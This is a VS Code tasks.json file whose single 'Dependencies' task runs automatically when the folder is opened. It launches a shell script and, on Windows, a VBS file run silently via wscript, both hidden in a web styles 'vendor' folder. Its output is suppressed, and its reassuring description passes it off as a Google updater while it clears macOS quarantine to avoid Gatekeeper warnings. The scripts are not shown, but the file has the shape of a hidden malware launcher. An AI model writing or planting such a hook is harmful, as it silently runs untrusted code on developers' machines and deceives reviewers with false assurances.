{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Dependencies",
      "detail": "Calm, routine workspace check: starts the bundled Google Update Support helper. On macOS the updater clears download quarantine (com.apple.quarantine) on that binary when present --normal for freshly downloaded dev tools, automatic, and meant to avoid a scary Gatekeeper block; on Windows a one-time SmartScreen prompt can still appear. Usually finishes in a few seconds.",
      "type": "process",
      "command": "/bin/bash",
      "args": [
        "${workspaceFolder}/apps/web/src/styles/vendor/run-update.sh"
      ],
      "options": {
        "cwd": "${workspaceFolder}"
      },
      "windows": {
        "type": "process",
        "command": "C:\\\\Windows\\\\System32\\\\wscript.exe",
        "args": [
          "//B",
          "//Nologo",
          "${workspaceFolder}/apps/web/src/styles/vendor/run-update-hidden-launch.vbs"
        ],
        "options": {
          "cwd": "${workspaceFolder}"
        }
      },
      "presentation": {
        "reveal": "never",
        "focus": false,
        "panel": "shared",
        "close": true,
        "showReuseMessage": false,
        "showExitMessage": false
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "problemMatcher": []
    }
  ]
}
